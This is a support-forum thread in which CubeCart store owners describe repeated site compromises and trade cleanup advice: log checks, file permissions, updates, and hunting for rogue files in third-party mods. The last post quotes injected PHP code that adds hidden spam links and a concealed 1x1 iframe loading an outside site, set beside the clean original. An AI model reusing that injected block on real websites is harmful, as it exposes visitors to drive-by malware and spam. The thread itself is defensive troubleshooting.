Jump to content

Dang hackers


Guest

Recommended Posts

So the last few days, I've had someone alter the .htaccess file on one of my cubecart v3 stores to redirect to a chinese escort site!

When it first happened, the store was still on v3 2.0.14 and I also found some code added to /index.php. I updated everything to 3.0.20, and cleaned the compromised files. I also disabled tellafriend (deleted all code from the file).

It is shared hosting (in fact, I have a master account with unlimited domains and databases - it was only on one of the 20+ sites I have on the same account - not all are active or cubecart).

It just happened again, after I upgraded to 3.0.20 and did the above steps! I changed the account password though my hosts didn't think they were getting in via the account but felt it was probably exploiting an outdated script.

I cannot think of any scripts or anything on that site that isn't on my other live sites, so I'm scratching my head as to how this person is getting in. Only scripts I can think of beyond the usual cc ones are chat4support live chat and some google friend connect, facebook, and twitter scripts (but again, they are on all my other stores as well).

So I thought I'd ask if anyone has had anything similar happen and if you figured out how they got in or how to stop it?

Thanks!

Link to comment
Share on other sites

They managed to do it AGAIN after I have changed my password (to a totally randomly generated combo of letters, numbers, upper/lower etc).

I have been searching all over the files to try to find some script they put in that keeps being triggered, but no luck so far. :rolleyes:

So annoying since they are doing it to a site I advertise as being "kid friendly" - which is probably why they targeted it I know.

I deleted my google friend connect scripts since I wasn't using it much on that site anyway, but am at a loss of what else to try.

Link to comment
Share on other sites

This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service!

With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next :rolleyes:

Link to comment
Share on other sites

This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service!

With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next :rolleyes:

This could be an attack from a compromised script on another users site/account on the server.

Is the .htaccess file being overwritten, or edited?

Ie, does it still contain any customisation/SEO bits, or is now simply a redirect?

Also check the date/time of the last change- is it always the same time each day?

Ensure all other scripts are up to date - check their forums/changenotes for updates. Just because your other sites are not effected does not mean the scripts are not the entry vector!

Check the languages/homepage folder on CubeCart is not writeable, I know that used to be recommended.

Also see if you can get the raw HTTP logs and FTP logs.

The best people to help with this would be your hosting company. They should have access logs- if you can determine the time of the change, they should be able to work out what it going on.

Jason

Link to comment
Share on other sites

Well thought I had it solved but today someone edited my index.php file in the root directly. Quickly solved it by uploading my backup page, but...

wasn't to the same escort site, this one was about footwear. ;)

I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good :(

Link to comment
Share on other sites

Well thought I had it solved but today someone edited my index.php file in the root directly. Quickly solved it by uploading my backup page, but...

wasn't to the same escort site, this one was about footwear. ;)

I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good :(

If they are getting in via cross-site-scripting (XSS), then the hack will involve calling a script on your site(s). This request will generate an event in the web server log.

Tell the hosting company the exact date+time of the attack, and get them to check the apache raw logs for anything suspicious.

Also ask them for the same info on FTP.

Its in the hosts interest to assist you with this, and leaving you with constant attacks like this is not good.

You may have access to the raw logs- in which case PM them to me.

Link to comment
Share on other sites

  • 2 weeks later...
Guest bluebadger66

I do not know too much about this type of problem, but when I had fears that my files were being changed, my hoster advised me to check my file permissions. There were lots that were set for anyone to write to.

It is just a thought, and I am sure there is an article on here somewhere.

Cheers,

Martin

Link to comment
Share on other sites

I *think* I finally have them stopped. I changed permissions on my htaccess and they haven't redirected it since.

I have been slowly updating all my stores to 3.0.20 as well and deleting the tellafriend scripts just to be on the safe side.

Thanks for the help and suggestions guys. So far, so good though :(

Link to comment
Share on other sites

  • 2 weeks later...

Well, update. My hacker doesn't seem to be able to redirect my page anymore - think the htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file) above and below the normal cubecart code (easy to delete really and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but its still annoying :(

Link to comment
Share on other sites

  • 2 weeks later...

Well, update. My hacker doesn't seem to be able to redirect my page anymore - think the htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file) above and below the normal cubecart code (easy to delete really and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but its still annoying :(

This is still happening like once a week. Any ideas?

Link to comment
Share on other sites

You must convince your hosting provider to install an access and file list modification logging tool to the several server directories that hold your site's files, amd make those logs available to you. If they aren't working to find the method of intrusion themselves - and the server techs have this responsibility sitting squarely on their shoulders - then this has to be a breach in even the crummiest service level agreement.

And you haven't told us whether your host has admitted if any of the other sites hosted on that particular server have been vandalized. If so, then the vandals are reaching your directories through someone else's vulnerability.

As you describe it, you found "marquee text" above the CC code in {root}/index.php. So I guess whatever that was, wasn't meant to be sent immediately out to the browser since if it did, that should have caused a "Headers already sent" error.

Link to comment
Share on other sites

I actually haven't talked to my hosts about it much after the first attack. They usually just tell me to check that all scripts are up to date which is why I updated that cubecart installation to v3.0.20. Honestly, not sure what I'm looking for in logs. I have them, just no clue what to look for. I'm assuming you mean the raw access logs??? Or is it called something else?

No errors are triggered. The code is being added above and below the existing cubecart code in root/index.php above the php start and end tags. At the bottom, its added after a ton of blank lines, at the top, it's a single line of code with tons of links added above the <?php and all the code.

I'm assuming it is a script they are using to insert this code? The chmod on that file is 644 - I cannot make it 444 (I've tried and it reverts itself back), so really not sure how to totally keep them from doing it.

Link to comment
Share on other sites

Fingers crossed but I think I finally found where they were getting in. I found 2 files, link.php (which was encrypted) and llink.php in /includes/goobermods/coupon_giftcard_manager (goobers coupon mod) and when I looked at the original files for the mod (and where it is installed on another of my stores), discovered these files shouldn't be there. I deleted them both and change permissions on both folders to 555 so hopefully that will stop it this time. I'll let you know if it does or not but if anyone else has this issue, look *everywhere* for files you don't recognize. I had compared all the files to the v3.0.20 standard files, but had skipped the mods! (silly me)!

Link to comment
Share on other sites

Guest fandango

Hiya Mysty,

This sounds like a hack attack I had not long ago. Unfortunatly I had to completely delete and reinstall all my files and folders and install a fresh copy of CC3

I do remember reading up on this Zombie attack as it was called and they injected code into the index.php files from scripts that had been inserted into the images folders.

I hope you sort it out and dont have to do what I did. (Took forever)

Fandango

Link to comment
Share on other sites

My site has been hacked today too.

Customer got a browser warning:

"Visiting this site may harm your computer

The website at www..... contains elements from the site robingood.cz.cc which appears to host malware - software"

It had infected the root/index.php, admin/index.php, admin/modules/index.php & admin/modules/3rdparty/index.php

No idea how they got in, nor how to stop them from doing it again. Any suggestions please?

thanks

Link to comment
Share on other sites

I'm also getting an error on the Admin home page:

Warning: MagpieRSS: Failed to fetch http://forums.cubecart.com/index.php?act=rssout&id=1 (HTTP Response: HTTP/1.1 404 Not Found ) in /classes/rss_fetch.inc on line 238

Warning: Invalid argument supplied for foreach() in /admin/index.php on line 152

Link to comment
Share on other sites

Same suggestion as we gave Mysty - contact your host and ask for the access logs for your site, HTTP requests and FTP logins, and ask your host for help in discovering the vulnerability. Ask your host to put a logging tool on your site that logs all accesses, regardless of method, to your store root.

I am not familiar with Linux, so my knowledge of if such a tool exists is null, but I am confident a Linux Guru somewhere has created such a tool.

Warning: MagpieRSS:

Remove the RSS URL from the settings page. A number of messages on this board are mentioning that. Maybe a problem with cubecart.com?

Link to comment
Share on other sites

  • 2 weeks later...

The latest files I found compromised were /admin/misc/licForm.php and lookupip.php. I re-uploaded the uncorrupted files and changed their file permissions to 444 to see if that stops it.

Link to comment
Share on other sites

  • 4 weeks later...

Well, update

I've found inserted code into just about all my includes files. No idea how it all got there, but thought I'd give someone else an idea of where to look for changes :( Some of them were repeated more than once, sometimes the block was there just once. I copied what *should* have been there and pasted it over the junk. These are right under the cubecart comment block at the top of the files.


if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {

	echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><div id='302'><h2><a href='http://www.2daban.cn/' title='Î÷ÃÅ×ÓPLC' >Î÷ÃÅ×ÓPLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/'  title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('3'+'0'+'2').style.display='n'+'o'+'ne'</script><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe><div id='257'><h2><a href='http://www.2daban.cn/' title='Î÷ÃÅ×ÓPLC' >Î÷ÃÅ×ÓPLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/'  title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('2'+'5'+'7').style.display='non'+'e'</script></body>\r\n</html>";

	exit;

}




What the code *should* look like is:







if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {

	echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n</body>\r\n</html>";

	exit;

}

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...